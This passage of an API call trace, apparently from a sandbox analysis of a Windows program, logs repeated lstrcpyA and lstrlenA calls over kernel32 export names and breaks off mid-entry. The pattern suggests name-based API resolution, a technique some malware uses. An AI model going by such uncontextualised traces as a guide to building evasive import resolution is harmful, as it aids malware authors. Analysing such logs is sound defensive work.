lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.171] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.171] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.171] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.171] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.171] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.171] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.171] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.171] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.171] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.171] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.171] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.172] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.172] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.172] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.172] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.172] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.172] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.172] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.172] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.172] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.172] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.172] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.172] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.172] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.172] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.172] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.172] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.172] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.172] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.173] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.173] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.173] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.173] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.173] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.173] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.173] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.173] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.173] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.173] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.173] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.173] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.173] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.173] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.173] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.173] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.173] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.173] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.174] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.174] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.174] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.174] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.174] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.174] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.174] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.174] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.174] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.174] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.174] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.174] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.174] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.174] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.174] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.174] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.174] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.174] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.174] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.175] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.175] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.175] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.175] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.175] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.175] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.175] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.175] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.175] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.175] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.175] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.175] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.175] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.175] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.175] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.175] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.175] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.175] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.175] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.176] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.176] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.176] lstrlenA (lpString="DELETEATOM") returned 10 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.176] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.176] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.176] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.176] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.176] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.176] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.176] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.176] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.176] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.176] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.176] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.176] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.176] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.176] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.176] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.176] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.177] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.177] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.177] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.177] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.177] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.177] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.177] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.177] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.177] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.177] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.177] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.177] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.177] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.177] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.177] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.177] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.177] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.177] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.178] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.178] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.178] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.178] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.178] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.178] lstrcpyA (in: 